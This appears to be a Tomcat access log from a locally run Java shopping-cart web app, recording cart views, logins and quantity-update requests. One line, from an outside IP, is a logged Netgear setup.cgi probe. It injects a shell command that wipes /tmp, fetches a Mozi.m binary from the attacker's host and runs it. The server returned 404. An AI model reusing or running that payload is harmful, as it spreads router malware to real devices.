0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:20:57 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-6 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:20:57 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-6 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:21:09 +0800] "GET /eswz/updateQuantity?goodsid=4&&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:21:09 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-6 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:21:09 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-6 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:24:22 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5229 http-bio-8080-exec-5 77
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:24:22 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-5 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:24:24 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5229 http-bio-8080-exec-5 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:24:24 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-5 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:24:26 +0800] "GET /eswz/updateQuantity?goodsid=20.0&&quantity=5 HTTP/1.1" 400 968 http-bio-8080-exec-5 3
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:24:51 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5229 http-bio-8080-exec-3 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:24:51 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-3 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:24:57 +0800] "GET /eswz/updateQuantity?goodsid=20.0&&quantity=5 HTTP/1.1" 400 968 http-bio-8080-exec-3 2
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:25:11 +0800] "GET /eswz/updateQuantity?goodsid=20.0&&quantity=5 HTTP/1.1" 400 968 http-bio-8080-exec-1 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:25:42 +0800] "GET /eswz/updateQuantity?goodsid=20.0&&quantity=5 HTTP/1.1" 400 968 http-bio-8080-exec-6 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:01 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:01 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 44
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:01 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 572
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:03 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:09 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:10 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:11 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-8 603
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:11 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:15 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:15 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-10 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:16 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:22 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:22 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:26:22 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:12 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:12 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 46
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:13 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 825
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:14 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:19 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:20 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:21 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-8 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:21 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:25 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 200 3901 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:25 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:45 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 200 3901 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:27:45 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:28:59 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:28:59 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:28:59 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 578
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:29:01 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:29:07 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:29:08 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:29:10 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-8 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:29:10 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:29:13 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 200 3901 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:29:13 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 64
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:29:27 +0800] "GET /eswz/updateQuantity?goodsid=9&&quantity=5 HTTP/1.1" 200 3901 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:29:27 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:17 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:17 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 34
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:17 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 470
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:20 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:25 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:27 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 49
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:28 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-8 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:28 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 29
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:31 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 200 3901 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:52 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:52 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:55 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 200 3901 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:32:55 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:33:00 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:33:00 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:33:07 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 200 3901 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:33:07 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:35 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:35 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 48
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:35 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 578
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:41 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:48 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:49 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:50 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-8 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:50 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:53 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:53 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:36:53 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:37:02 +0800] "GET /eswz/updateQuantity?goodsid=9&&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:37:02 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:37:02 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:37:04 +0800] "GET /eswz/updateQuantity?goodsid=4&&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:37:04 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-10 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:16:37:04 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:17:59:44 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:17:59:44 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 84
0:0:0:0:0:0:0:1 - - [20/Nov/2022:17:59:45 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 745
0:0:0:0:0:0:0:1 - - [20/Nov/2022:17:59:45 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:17:59:46 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:17:59:53 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:17:59:54 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-8 36
0:0:0:0:0:0:0:1 - - [20/Nov/2022:17:59:58 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-9 30
0:0:0:0:0:0:0:1 - - [20/Nov/2022:17:59:58 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 31
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:00:05 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-3 32
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:00:05 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:00:05 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-5 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:00:56 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:00:56 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 36
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:00:57 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 745
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:00:59 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:01:05 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:01:06 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-9 32
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:01:07 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:01:07 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:01:13 +0800] "GET /eswz/updateQuantity?goodsid=3&&quantity=5 HTTP/1.1" 302 - http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:01:13 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5221 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:01:13 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:02 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:02 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 107
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:03 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 818
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:04 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:11 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:13 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 32
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:15 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5667 http-bio-8080-exec-8 729
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:15 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 32
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:17 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:18 +0800] "GET /eswz/bootstrap-5.1.3-dist/js/bootstrap.bundle.min.js.map HTTP/1.1" 200 331017 http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:18 +0800] "GET /eswz/bootstrap-5.1.3-dist/css/bootstrap.min.css.map HTTP/1.1" 200 451427 http-bio-8080-exec-10 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:31 +0800] "GET /eswz/updateQuantity?goodsid=3 HTTP/1.1" 400 1064 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:24:31 +0800] "GET /eswz/updateQuantity?quantity=2 HTTP/1.1" 500 5051 http-bio-8080-exec-1 19
175.107.1.103 - - [20/Nov/2022:18:32:58 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.1.103:53988/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:26 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:26 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 39
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:27 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 636
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:28 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:33 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:34 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:36 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5659 http-bio-8080-exec-8 824
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:36 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:44 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 31
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:44 +0800] "GET /eswz/bootstrap-5.1.3-dist/js/bootstrap.bundle.min.js.map HTTP/1.1" 200 331017 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:38:44 +0800] "GET /eswz/bootstrap-5.1.3-dist/css/bootstrap.min.css.map HTTP/1.1" 200 451427 http-bio-8080-exec-10 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:41:02 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5665 http-bio-8080-exec-5 157
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:41:02 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-5 43
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:41:02 +0800] "GET /eswz/bootstrap-5.1.3-dist/js/bootstrap.bundle.min.js.map HTTP/1.1" 200 331017 http-bio-8080-exec-5 3
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:41:02 +0800] "GET /eswz/bootstrap-5.1.3-dist/css/bootstrap.min.css.map HTTP/1.1" 200 451427 http-bio-8080-exec-6 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:41:14 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5665 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:41:14 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-6 32
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:41:14 +0800] "GET /eswz/bootstrap-5.1.3-dist/js/bootstrap.bundle.min.js.map HTTP/1.1" 200 331017 http-bio-8080-exec-6 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:41:14 +0800] "GET /eswz/bootstrap-5.1.3-dist/css/bootstrap.min.css.map HTTP/1.1" 200 451427 http-bio-8080-exec-6 2
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:44:51 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5677 http-bio-8080-exec-8 288
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:44:51 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-8 45
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:44:51 +0800] "GET /eswz/bootstrap-5.1.3-dist/js/bootstrap.bundle.min.js.map HTTP/1.1" 200 331017 http-bio-8080-exec-8 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:44:51 +0800] "GET /eswz/bootstrap-5.1.3-dist/css/bootstrap.min.css.map HTTP/1.1" 200 451427 http-bio-8080-exec-8 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:44:58 +0800] "GET /eswz/updateQuantity?quantity=4&goodsid=3 HTTP/1.1" 400 968 http-bio-8080-exec-8 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:45:52 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5677 http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:45:52 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:45:52 +0800] "GET /eswz/bootstrap-5.1.3-dist/js/bootstrap.bundle.min.js.map HTTP/1.1" 200 331017 http-bio-8080-exec-10 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:45:52 +0800] "GET /eswz/bootstrap-5.1.3-dist/css/bootstrap.min.css.map HTTP/1.1" 200 451427 http-bio-8080-exec-2 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:45:59 +0800] "GET /eswz/updateQuantity?quantity=4&goodsid=4 HTTP/1.1" 400 968 http-bio-8080-exec-2 2
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:35 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:35 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 44
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:36 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 900
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:38 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:43 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:44 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 27
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:46 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-8 564
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:46 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:50 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:50 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:50 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:53 +0800] "GET /eswz/updateQuantity?goodsid=9&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:53 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:53 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:58 +0800] "GET /eswz/updateQuantity?goodsid=4&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:58 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:54:58 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:55:07 +0800] "GET /eswz/updateQuantity?goodsid=9&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:55:07 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5253 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:55:07 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:37 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:37 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [20/Nov/2022:18:56:37 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 523
